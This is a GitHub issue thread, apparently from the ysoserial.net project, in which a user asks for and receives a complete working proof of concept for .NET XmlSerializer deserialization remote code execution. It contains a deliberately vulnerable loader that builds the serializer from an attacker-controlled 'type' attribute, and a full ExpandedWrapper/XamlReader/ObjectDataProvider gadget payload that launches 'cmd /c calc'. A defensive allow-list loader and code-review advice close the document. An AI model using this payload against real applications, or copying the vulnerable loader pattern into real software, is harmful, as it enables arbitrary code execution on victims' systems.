
Comments (9)

adon90 commented on July 30, 2024

Thank you very much, Alvaro, for that code; honestly it has been quite hard for me to find a PoC like this that works well without needing 1000 classes and crap, so I appreciate it. The final code, with the imports and with a small bug it had when loading the XML fixed, is this:

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Xml;
using System.Xml.Serialization;

namespace XMLDoc
{
   
    class Program
    {
        static void Main(string[] args)
        {

            var xmlDoc = new XmlDocument();

            xmlDoc.Load(@"d:\miau.xml");

            foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/root"))
            {

                string typeName = xmlItem.GetAttribute("type");
                Console.WriteLine(typeName);

                var xser = new XmlSerializer(Type.GetType(typeName));

                var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
                xser.Deserialize(reader);
            }

        }
    }
}

;)!

from ysoserial.net.

pwntester commented on July 30, 2024

Hi,

For XmlSerializer to be vulnerable, attacker needs to be able to control expected type:

XmlSerializer xmlSerializer = new XmlSerializer(<attacker controllable>, "http://web.com/a");

Cheers,
A


adon90 commented on July 30, 2024

Hey, I am doing tests with Visual Studio and I haven't managed to create vulnerable XmlSerializer code from scratch. Please send me a simple vulnerable project or point me in the right direction; the one I am using is this one:

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Xml.Serialization;

namespace WindowsFormsApplication3

{
    [XmlRoot]
    public class TestClass
    {
        public string classname;
        private string name;
        private int age;
        [XmlAttribute]
        public string Classname { get { return classname; } set { classname = value; } }
        [XmlElement]
        public string Name { get { return name; } set { name = value; } }
        [XmlElement]
        public int Age { get { return age; } set { age = value; } }
        public override string ToString()
        {
            return base.ToString();
        }

    }

    class Program
    {
        static void Main(string[] args)
        {
            TestClass testClass = new TestClass();

            using (var stream = new FileStream(@"d:\1.xml", FileMode.Open))
            {

                var serializers = new XmlSerializer(typeof(TestClass));
                testClass = serializers.Deserialize(stream) as TestClass;

            }
            MessageBox.Show(testClass.Name);

        }
    }
} 

But I think that class doesn't meet the conditions, I would appreciate some help, thanks


adon90 commented on July 30, 2024

This is the payload I am using:

<?xml version="1.0" encoding="utf-8"?>
<ExpandedWrapperOfTestClassObjetDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ProjectedProperty0> 
<ObjectInstance xsi:type="TestClass">
<Age>0</Age> 
<MethodName>ClassMethod</MethodName>
<MethodParameters>
<anyType xsi:type="xsd:string">calc.exe</anyType>
</MethodParameters>
</ProjectedProperty0>
</ExpandedWrapperOfTestClassObjetDataProvider>


pwntester commented on July 30, 2024

Check slide 47 here: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf

Attacker needs to be able to control expected type as DNN was doing here:
https://github.com/dnnsoftware/Dnn.Platform/blob/a142594a0c18a589cb5fb913a022eebe34549a8f/DNN%20Platform/Library/Common/Utilities/XmlUtils.cs#L201


adon90 commented on July 30, 2024

Hello Alvaro, thank you very much, but, if that's not too much to ask for, could you please provide me a complete code I can just use straightforward not parts of code? Thanks


adon90 commented on July 30, 2024

This is my code now. If you tell me how to set the "miau.xml" payload up based on the code to test command execution, that would be epic. Thanks!!!

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Xml;
using System.Xml.Serialization;

namespace WindowsFormsApplication3

{
  
    class Program
    {
        static void Main(string[] args)
        {
         
            var xmlDoc = new XmlDocument();

            xmlDoc.Load("miau.xml"); // Load() opens a file; LoadXml() expects the XML text itself

            foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/item")) {

                string typeName = xmlItem.GetAttribute("type");
                var xser = new XmlSerializer(Type.GetType(typeName));

            }
           
        }
    }
}


pwntester commented on July 30, 2024

Just make the argument to XmlSerializer take a type derived from a string controlled by the attacker. Check the new RCE found on Sharepoint for another example:

https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability


pwntester commented on July 30, 2024

Haven't tried it but it should be something like:

using System;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

namespace WindowsFormsApplication3

{
  
    class Program
    {
        static void Main(string[] args)
        {
         
            var xmlDoc = new XmlDocument();

            xmlDoc.Load("miau.xml"); // Load() opens a file; LoadXml() expects the XML text itself

            foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/root")) {

                string typeName = xmlItem.GetAttribute("type");
                var xser = new XmlSerializer(Type.GetType(typeName));

                var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
                xser.Deserialize(reader);
            }
           
        }
    }
}

And then miau.xml should be the one you generated:

<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
    <ExpandedWrapperOfXamlReaderObjectDataProvider>
        <ExpandedElement/>
        <ProjectedProperty0>
            <MethodName>Parse</MethodName>
            <MethodParameters>
                <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
                    &lt;ResourceDictionary xmlns=&quot;http://schemas.microsoft.com/winfx/2006/xaml/presentation&quot; xmlns:x=&quot;http://schemas.microsoft.com/winfx/2006/xaml&quot; xmlns:System=&quot;clr-namespace:System;assembly=mscorlib&quot; xmlns:Diag=&quot;clr-namespace:System.Diagnostics;assembly=system&quot;&gt;
                        &lt;ObjectDataProvider x:Key=&quot;LaunchCmd&quot; ObjectType=&quot;{x:Type Diag:Process}&quot; MethodName=&quot;Start&quot;&gt;
                            &lt;ObjectDataProvider.MethodParameters&gt;
                                &lt;System:String&gt;cmd&lt;/System:String&gt;
                                &lt;System:String&gt;/c calc&lt;/System:String&gt;
                            &lt;/ObjectDataProvider.MethodParameters&gt;
                        &lt;/ObjectDataProvider&gt;
                    &lt;/ResourceDictionary&gt;
                </anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="XamlReader"></ObjectInstance>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>

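The loaders in this thread all share one property: the argument to `new XmlSerializer(...)` comes from `Type.GetType()` on a `type` attribute read out of the document, which is the condition Alvaro names for XmlSerializer to be exploitable. As an added example, not code from this thread, from ysoserial.net or from Alvaro, here is the defender's counterpart to that loader: the expected type is picked from a closed allow-list keyed by the root element name, so a `type` attribute such as the `ExpandedWrapper` one in `miau.xml` never reaches `Type.GetType` or the serializer constructor. The `Item` class, the `item` root name, the `SafeXmlLoader` name and the file path are assumptions for illustration.

```csharp
// Added example, not code from the thread or from ysoserial.net.
// Hardened counterpart to the "type"-attribute loader: the expected type for
// XmlSerializer comes from an allow-list the application owns, never from the document.
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

namespace SafeXmlLoading
{
    // Hypothetical DTO standing in for whatever the application really expects.
    [XmlRoot("item")]
    public class Item
    {
        [XmlElement("name")] public string Name { get; set; }
        [XmlElement("age")] public int Age { get; set; }
    }

    public static class SafeXmlLoader
    {
        // Closed allow-list keyed by root element name. Type.GetType(untrustedString)
        // is exactly what lets the ExpandedWrapper/ObjectDataProvider gadget in.
        private static readonly Dictionary<string, Type> KnownRootTypes =
            new Dictionary<string, Type>(StringComparer.Ordinal)
            {
                { "item", typeof(Item) },
            };

        public static object Load(string path)
        {
            var settings = new XmlReaderSettings
            {
                DtdProcessing = DtdProcessing.Prohibit, // no DTDs, no entity expansion
                XmlResolver = null,                      // no external resource fetches
            };

            using (XmlReader reader = XmlReader.Create(path, settings))
            {
                // Look only at the root element's name; any "type" attribute is ignored.
                if (reader.MoveToContent() != XmlNodeType.Element)
                    throw new InvalidDataException("Document has no root element.");

                Type expected;
                if (!KnownRootTypes.TryGetValue(reader.LocalName, out expected))
                    throw new InvalidDataException("Unexpected root element: " + reader.LocalName);

                // The serializer is built from the application's own type, so the
                // document cannot steer it toward ObjectDataProvider or XamlReader.
                var serializer = new XmlSerializer(expected);
                if (!serializer.CanDeserialize(reader))
                    throw new InvalidDataException("Root element does not match " + expected.Name);

                return serializer.Deserialize(reader);
            }
        }
    }

    class Program
    {
        static void Main(string[] args)
        {
            // Constructed sample: the "type" attribute is present but never consulted.
            // A file whose root is the thread's <root type="...ExpandedWrapper`2..."> is
            // rejected by the allow-list lookup before any serializer is created.
            File.WriteAllText("item.xml",
                "<item type=\"whatever-the-document-says\"><name>Alice</name><age>30</age></item>");
            var item = (Item)SafeXmlLoader.Load("item.xml");
            Console.WriteLine(item.Name + " " + item.Age);
        }
    }
}
```

The point is the same one the DNN and SharePoint fixes linked above needed: the type handed to `XmlSerializer` must be a compile-time type or a lookup into types the application defines, never `Type.GetType(string)` over data from the document or the request. In code review, `Type.GetType(` or `Assembly.Load(` feeding an `XmlSerializer` or `DataContractSerializer` constructor is the pattern to flag, and `DtdProcessing.Prohibit` with a null resolver closes off the unrelated XXE surface of the same reader.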
